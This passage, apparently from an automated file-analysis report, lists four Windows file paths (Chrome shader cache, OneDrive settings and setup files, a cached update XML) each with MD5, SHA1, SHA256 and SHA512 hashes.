SHA512 535622ee157ab397a7dbe0244cf3e722b7c5ce760bdede1330a5b6923c1e3e72b523fdc16e3792ad072949c670eb395e64b5105fac0b687379a0dd777c3d71f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 ba2fe4c848b296294110e712acc6f821
SHA1 2c160a43ad6454a002da9454a838e56788b0f5fe
SHA256 647c0619b65be4e669129687dd84861d5edead517bab26da4d15b02a1e8a5fe2
SHA512 ef2644991aa26e383fd015a38a0f62e19197a62856ccbfda807edef8230a1ddf3b3b253aa57ae039e38f2ac89410901fb2b7b77e03b393b2a9657425e8456c49

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json

MD5 e516a60bc980095e8d156b1a99ab5eee
SHA1 238e243ffc12d4e012fd020c9822703109b987f6
SHA256 543796a1b343b4ebc0285d89cb8eb70667ac7b513da37495e38003704e9d88d7
SHA512 9b51e99ba20e9da56d1acc24a1cf9f9c9dbdeb742bec034e0ff2bc179a60f4aff249f40344f9ddd43229dcdefa1041940f65afb336d46c175ffeff725c638d58

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2G6VS791\update100[1].xml

MD5 53244e542ddf6d280a2b03e28f0646b7
SHA1 d9925f810a95880c92974549deead18d56f19c37
SHA256 36a6bd38a8a6f5a75b73caffae5ae66dfabcaefd83da65b493fa881ea8a64e7d
SHA512 4aa71d92ea2c46df86565d97aac75395371d3e17877ab252a297b84dca2ab251d50aaffc62eab9961f0df48de6f12be04a1f4a2cbde75b9ae7bcce6eb5450c62

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe

MD5 fb4aa59c92c9b3263eb07e07b91568b5
SHA1 6071a3e3c4338b90d892a8416b6a92fbfe25bb67
SHA256 e70e80dbbc9baba7ddcee70eda1bb8d0e6612dfb1d93827fe7b594a59f3b48b9
SHA512 60aabbe2fd24c04c33e7892eab64f24f8c335a0dd9822eb01adc5459e850769fc200078c5ccee96c1f2013173bc41f5a2023def3f5fe36e380963db034924ace